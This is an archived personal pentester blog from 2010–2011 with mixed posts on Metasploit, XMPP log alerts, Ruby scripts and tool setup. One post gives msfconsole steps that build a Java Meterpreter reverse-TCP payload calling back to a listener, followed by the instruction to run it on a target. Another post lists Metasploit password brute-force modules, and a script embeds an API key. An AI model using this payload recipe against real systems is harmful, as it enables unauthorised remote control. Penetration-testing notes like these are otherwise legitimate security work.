0x0e.org | pentesting perspective

Pentestify.

jcran — Wed, 22 Jun 2011 03:23:20 +0000

i’m over here now.

password hangover

jcran — Fri, 10 Jun 2011 18:30:30 +0000

Just saw the Hangover 2. – funny (and true) bit on passwords…

as an international drug dealer tranfers money between accounts:

“your password is bologna1?”

“it used to be bologna, but they make you include a stupid number now”

*facepalm*

sadly (… or happily, depending on your perspective :] ) , weak passwords are still common…. metasploit has some awesome modules to test passwords:

jcran@disko:~/framework/modules$ find . |grep _login | grep -v svn

./auxiliary/scanner/snmp/snmp_login.rb
./auxiliary/scanner/mssql/mssql_login.rb
./auxiliary/scanner/postgres/postgres_login.rb
./auxiliary/scanner/http/wordpress_login_enum.rb
./auxiliary/scanner/http/axis_login.rb
./auxiliary/scanner/http/tomcat_mgr_login.rb
./auxiliary/scanner/http/http_login.rb
./auxiliary/scanner/http/frontpage_login.rb
./auxiliary/scanner/ftp/ftp_login.rb
./auxiliary/scanner/vnc/vnc_login.rb
./auxiliary/scanner/ssh/ssh_login_pubkey.rb
./auxiliary/scanner/ssh/ssh_login.rb
./auxiliary/scanner/telnet/telnet_login.rb
./auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
./auxiliary/scanner/lotus/lotus_domino_login.rb
./auxiliary/scanner/mysql/mysql_login.rb
./auxiliary/scanner/rservices/rsh_login.rb
./auxiliary/scanner/rservices/rlogin_login.rb
./auxiliary/scanner/rservices/rexec_login.rb
./auxiliary/scanner/smb/smb_login.rb
./auxiliary/scanner/oracle/isqlplus_login.rb
./auxiliary/scanner/oracle/oracle_login.rb
./auxiliary/fuzzers/tds/tds_login_username.rb
./auxiliary/fuzzers/tds/tds_login_corrupt.rb
./auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb
./auxiliary/admin/oracle/oracle_login.rb
./exploits/windows/imap/mailenable_login.rb
./exploits/windows/imap/mercury_login.rb
./exploits/windows/http/hp_power_manager_login.rb

throwaway osx post (until i need it again)

jcran — Sat, 16 Apr 2011 23:51:17 +0000

use homebrew (instead of ports) for installing software.

grab the rdio and soundcloud apps.

trying bind an applescript to a key? use fastscripts (for open-terminal-here functionality).

pay for TextMate (it’s worth it).

set up rvm.

blog using ecto.

reaper, ableton, tweetdeck, etc.

System Event Monitoring with Prosody and jablog.rb

jcran — Tue, 22 Mar 2011 03:27:10 +0000

The tl;dr version of this post is:

It turns out to be super handy to be able to monitor your logs (and send commands) via XMPP. To do so, here is a simple setup.

apt-get install prosody (Tested on ubuntu 10.04.2 LTS)
configure a VirtualHost for your domain in the config file /etc/prosody/ (see: http://www.0x0e.org/x/prosody.ctl.lua)
set up srv records, (use this generator: http://www.jms1.net/jabberd2/srv.shtml)
create 2 accounts – prosodyctl adduser user@domain && prosodyctl addusser minion@domain (one for you, one for your bot/minion)

install ruby / gem install xmpp4r, add a sigs.txt and configure the script with jabber/ syslog-ng

configure syslog-ng (and make it report to the jablog.rb script)

… And the backstory / howto:

Just got done setting up an internal jabber server on my domain. Why you might ask? You’re not that popular that you need your own chat server are you? Definitely not. But there’s a lot of crap going on in a network, even a small one, for you to benefit from on-demand notifications. An internal jabber server is a great way to implement this.

To be fair, the idea and the code for the log monitoring daemon is blatently stolen. I discovered it when attempting to connect to a friend’s server, and he immediately pinged me to ask what i was doing (for the record, not malicious, just remote-mounting a drive. :p). Paraphrasing:

Me: “How did you see me doing that?” (Thinking he was tail -f’ing his logs)
Him: “Oh I monitor logs & route certain events through XMPP”
Me: “Neat!”
Him: “Check it out –> jablog.rb “

Okay, well, now i need a jabber server.

So, naturally, if you’re like me, you take the first google link and run w/ it.

$sudo apt-get install jabberd

Fail, and fail hard. Jabberd, the original Jabber implementation, is a pain to set up.

Okay, let’s scrap that and try again.

Ejabberd. “Oh neat, Erlang!” you might say. — Wrong again. I wasn’t able to get this set up an configured in any sort of easy way. :/ Possibly due to leftover cruft from jabberd. Here’s the link just for the record.

…more searching, and came across this server called Prosody. Hmm, this looks really trivial, and it’s in apt already. Exactly what I’m looking for.

$ apt-cache search prosody
prosody - Lightweight Jabber/XMPP server written in Lua
[code]

[code]
$ apt-get install prosody
...
 * Starting Prosody XMPP Server prosody [ OK ]

Now, just configure w/ a host (toss these lines to the top of the config file /etc/prosody/prosody.cfg.lua) – or see the full config.

Host "0x0e.local"
	enabled = "true"

See the full config here:

And set up your srv records in bind for your host named jabber and domain named 0x0e.local (or use this awesome generator):

_jabber._tcp.0x0e.local.       IN SRV   0 0 5269   jabber.
_xmpp-server._tcp.0x0e.local.  IN SRV   0 0 5269   jabber.
_xmpp-client._tcp.0x0e.local.  IN SRV   0 0 5222   jabber.

Then add a couple users / passwords and you’re all set:

 $prosodyctl adduser jcran@0x0e.local
 $prosodyctl adduser jablog@0x0e.local

More info on account control here. Other, more specialized config info can be found here.

Getting the script going is as installing ruby (you probably already have it) and the xmpp4r gem (you probably don’t)

$sudo apt-get install ruby ## consider using RVM, but this is system-wide for syslog
$sudo gem install xmpp4r

Add a sigs.txt file with a few lines you’d like to be notified of (wouldn’t you want to be notified if “oh noes!” is printed in the logs?):

error
failed
segfault
oh noes!

Then modify a few lines of the script to point to the right accounts:

@host = `hostname`.strip
@mine = "jablog@0x0e.local/#{@host}"    # Change this to your user/pass/server
@pass = "SECRETZ"                    # Set a password here
@targ = "jcran@0x0e.local/jcran"     # Change this to your jabber ID

Now just configure your IM client to talk XMPP to the server (just point it at the domain, the client should read the SRV records & do the right thing):

Configuration in Pidgin

To complete the setup, you’ll want to install syslog-ng and place the jablog.rb script & sigs in /usr/sbin/:

# apt-get install syslog-ng
# cp jablog /usr/sbin
# cp sigs.txt /usr/sbin

Test this by running the script as root:

# ruby jablog.rb

You should see the script initialize in your im client if everything’s configured properly.

Now, you just need to configure syslog-ng to run the script:

destination jabber {
program("/usr/sbin/jablog.rb");
};

log {     source(s_all);
destination(jabber);
};

One thing you may run into is that syslog-ng may exit immediately, and keep attempting to run the jablog.rb file. If this happens, double-check your ruby config (make sure the syslog-ng user has access to the ruby environ (ie, not in your user’s rvm environment).

Once it’s configured properly, restart syslog-ng and you should see the script initialize in your IM client.

Note that I didn’t specify how to configure SSL here, but you can definitely do that. See the docs. Special thanks to quine who pointed out you don’t need to specify a connect server, the SRV records take care of that.

Take the recipe / script, rinse and repeat on all your servers, and let me know if you make any improvements.

Also, if you end up running the jabber server on one network, and need access to it from another, dnsmasq is super handy. See this blog.

pianobar is epic!

jcran — Sat, 13 Nov 2010 19:05:34 +0000

@mrbarrett just pointed me at pianobar, a command-line client for pandora. It gets rid of the need for flash player, and allows you to bypass some of the limitations of the web client (you can skip more than 5 songs!).

To install (on Ubuntu):


sudo apt-get install git-core libao-dev libfaad-dev libmad0-dev
git clone git://github.com/PromyLOPh/pianobar.git
cd pianobar
make
sudo make install

enjoy!

Loading only the Metasploit modules you use

jcran — Fri, 12 Nov 2010 16:16:09 +0000

The framework is taking quite a while to load on my machine these days, so i decided to stop loading all modules by default, and load only those modules i need. Here’s the process:

Simply comment the module-loading lines in the framework file lib/msf/base/simple/framework.rb, so :


if (Msf::Config.module_directory)

framework.modules.add_module_path(Msf::Config.module_directory)

end

becomes


#if (Msf::Config.module_directory)

#framework.modules.add_module_path(Msf::Config.module_directory)

#end

Or you can apply this patch: http://www.0x0e.org/x/framework-no-default-mods.patch

Alos make sure to remove the ~/.msf3/modcache directory.

Then, mirroring the framework modules directory structure, copy the modules you’d like to load into your .msf3/modules directory. For example, if you wanted to load only the psexec module and the reverse_tcp payload, copy

modules/exploits/windows/smb/psexec.rb into ~/.msf3/modules/exploits/windows/smb/psexec.rb
modules/payloads/stagers/windows/reverse_tcp.rb into ~/.msf3/modules/payloads/stagers/windows/reverse_tcp.rb

You should now see a load-time speed improvement on the order of:

Before:

jcran@disko:~/framework$ time ./msfconsole -r exit.rc

                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 630 exploits - 310 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r10985 updated today (2010.11.11)

resource (exit.rc)> exit
resource (exit.rc)> exit

real	0m42.750s
user	0m40.710s
sys	0m0.820s

After:

jcran@disko:~/framework$ time ./msfconsole -r exit.rc

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 1 exploits - 0 auxiliary
+ -- --=[ 1 payloads - 0 encoders - 0 nops
       =[ svn r10985 updated today (2010.11.11)

resource (exit.rc)> exit
resource (exit.rc)> exit

real	0m12.232s
user	0m11.340s
sys	0m0.510s

Not huge, but definitely an improvement.

IP List to KML generator (Create a google map from a list of IPs)

jcran — Thu, 11 Nov 2010 03:39:57 +0000

Pretty simple, it takes a file with a list of ips, one/line and generates a kml file. Very handy if you’re working on a large pentest and want to track down (and visualize) where a particular host is located. It uses the Yahoo GeoIP API to grab location data.

#!/usr/bin/ruby

require 'net/http'
require 'rexml/document'

include REXML

def getAddress(ip)
#takes an ip and returns an xml blob with city/state
# example: http://ipinfodb.com/ip_query.php?ip=65.23.23.33
 url = "http://ipinfodb.com/ip_query.php?ip=" + ip
 #puts "DEBUG: URL: #{url.to_s}"
 resp = Net::HTTP.get(URI.parse(url))
 #print "DEBUG: got " + resp
return resp
end

def getCoordinates(address)
#takes a hash with city, state address and returns a hash w/ coords
url = "http://local.yahooapis.com/MapsService/V1/geocode"
 params = {
 "appid" => "GwLDY.bV34HH7gkBDs97p_5U5P_tBfXBnfDyYFwpTRLwZDEvgj8BOQqws1JOCFPyhTQR",
 "street" => "",
 "city" => address["city"],
 "state" => address["state"]
 }
 #puts "DEBUG: URL: #{url.to_s}"
 resp = Net::HTTP.post_form(URI.parse(url), params)
 resp_text = resp.body
 #print "DEBUG: got " + resp_text
return resp_text
end

def parseAddress(xml)
#takes an xml blob with city / state & returns a hash with address,city,state
 doc = Document.new xml
 root = doc.root

 city = root.elements["City"].get_text.to_s
 state = root.elements["RegionName"].get_text.to_s
 country = root.elements["CountryCode"].get_text.to_s

 #puts "DEBUG: city: " + city
 #puts "DEBUG: state: " + state
 #puts "DEBUG: country: " + country

 toReturn = Hash["city" => city, "state" => state, "country" => country]
 return toReturn
end

def parseCoordinates(xml)
#takes an xml blob with coordinates & returns a hash with long/lat
 doc = REXML::Document.new xml
 root = doc.root

 long = REXML::XPath.first( doc, "//Longitude" ).get_text.to_s
 lat = REXML::XPath.first( doc, "//Latitude" ).get_text.to_s

 toReturn = Hash["long" => long, "lat" => lat]

 #puts "DEBUG: long: " + long
 #puts "DEBUG: lat: " + lat

 return toReturn
end

def genKML(ips)
 kml = ""
 kml = kml + "\n"
 kml = kml + "\n"
 kml = kml + "\n"
 ips.each do |ip|
 ip = ip.to_s.chomp
 kmlplacemark = mip(ip,"error.log")

 if kmlplacemark.to_s != "" then
 #        puts "DEBUG: adding non-blank placemark" + kmlplacemark
 kml = kml + kmlplacemark
 else
 #        puts "DEBUG: unable to map ip: " + ip + "\n"
 end
 end

 kml = kml + "\n"
 kml = kml + "\n"
end

def genPlacemark(ip,address,coordinates)
 xml = ""
 xml = xml + "    \n"
 xml = xml + "        " + ip + "\n"
 xml = xml + "        "
 xml = xml + address["city"] + ", "
 xml = xml + address["state"] + ", "
 xml = xml + address["country"]
 xml = xml + "\n"
 xml = xml + "        \n"
 xml = xml + "            " +
 coordinates["long"]  + "," +
 coordinates["lat"] + ",0\n"
 xml = xml + "        \n"
 xml = xml + "    \n"
end


def mip(ip,errorfile)
 begin
 if (ip != "") then
 xmlAddress = getAddress(ip)
 objAddress = parseAddress(xmlAddress)

 if (objAddress["state"] != "") then
 xmlCoordinates = getCoordinates(objAddress)
 objCoordinates = parseCoordinates(xmlCoordinates)

 kmlplacemark = genPlacemark(ip,objAddress,objCoordinates)
 else
 File.open(errorfile, 'w') {|f| f.write(ip) }

 end
 end
 rescue
 kmlplacemark = ""
 end

return kmlplacemark
end

def mips(file)
 counter = 0
 ips = Array.new

 File.open(file, "r") do |infile|

 while (line = infile.gets)
 #puts "mapping #{counter}: #{line}"

 ips[counter] = line

 counter = counter + 1
 end
 end
 kml = genKML(ips)
 return kml
end


kml = mips(ARGV[0])
out = File.new(ARGV[0]+".kml", "w")
out.puts kml

Metasploit HowTo: Standalone Java Meterpreter Connect-Back

jcran — Sun, 17 Oct 2010 23:41:20 +0000

Here are some quick notes on how to create a connect-back Java Meterpreter .jar file. The process is very straightforward, simply generate the .jar, setup a handler. Then move the .jar to your target & execute it.

Note! Nightranger’s method to do this is currently out of date (10/17/2010).

Following mihi’s instructions, create the payload:

msf exploit(java_signed_applet) > use test/java_tester
msf exploit(java_tester) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_tester) > set LHOST 10.0.0.11
msf exploit(java_tester) > set LPORT 4444
msf exploit(java_tester) > exploit
[*] Started reverse handler on 10.0.0.11:4444
[*] Sending stage (26938 bytes) to 10.0.0.11
[*] Meterpreter session 1 opened (10.0.0.11:4444 -> 10.0.0.11:60519) at 2010-10-17 17:50:29 -0500
^C
[*] Exploit completed, but no session was created.
msf exploit(java_tester) > [*] Meterpreter session 1 closed.  Reason: Died
msf exploit(java_tester) > ls
payload.jar

now, set up the handler:

msf exploit(java_tester) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.0.11
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

copy the payload to the target & run it, and you’re golden. no need to fiddle with classpath or anything, the loader jar is self-contained.

searching ruby source code

jcran — Mon, 19 Jul 2010 16:21:30 +0000

contributing to open source? need to search & understand ruby code faster? This bash function should save you some time. I use it atleast 50-60 times a day.

Stick this in your .bashrc:

function rgrep() {
   find -L . -type f -name \*.rb -exec grep -n -i -H --color "$1" {} \;
}

Use like: $ rgrep “something”

ruby hash per-value defaults

jcran — Mon, 19 Jul 2010 16:12:14 +0000

Here’s a quick tip for assigning default values with a ruby hash. It’s well publicized that you can set an overall default (i think this is called “default assignment”) for the hash with the .default method like this (stolen directly from the rubydocs):

h = Hash.new                            #=> {}
   h.default                               #=> nil
   h.default(2)                            #=> nil

   h = Hash.new("cat")                     #=> {}
   h.default                               #=> "cat"
   h.default(2)                            #=> "cat"

   h = Hash.new {|h,k| h[k] = k.to_i*10}   #=> {}
   h.default                               #=> 0
   h.default(2)                            #=> 20

But you can also set per-key defaults using the or-operator. if an assigned value is false, or nil, you’ll get the default value. See below:

ruby-1.9.1-p378 > x = {}
=> value: {}
ruby-1.9.1-p378 > x[:y] = "y"
=> value: "y"
ruby-1.9.1-p378 > x[:y]
=> value: "y"
ruby-1.9.1-p378 > x[:y] = "y" || "noty"
=> value: "y"
ruby-1.9.1-p378 > x[:y]
=> value: "y"
ruby-1.9.1-p378 > x[:y] = nil || "noty"
=> value: "noty"
ruby-1.9.1-p378 > x[:y] = false || "noty"
=> value: "noty"
ruby-1.9.1-p378 > x[:y] = "" || "noty"
=> value: ""

… Note that or-assignment doesn’t work in this case:

ruby-1.9.1-p378 > x[:y] = "" ||= "noty"
SyntaxError: (irb):19: syntax error, unexpected tOP_ASGN, expecting $end
x[:y] = "" ||= "noty"
^
from /home/jcran/.rvm/rubies/ruby-1.9.1-p378/bin/irb:17:in `'
ruby-1.9.1-p378 >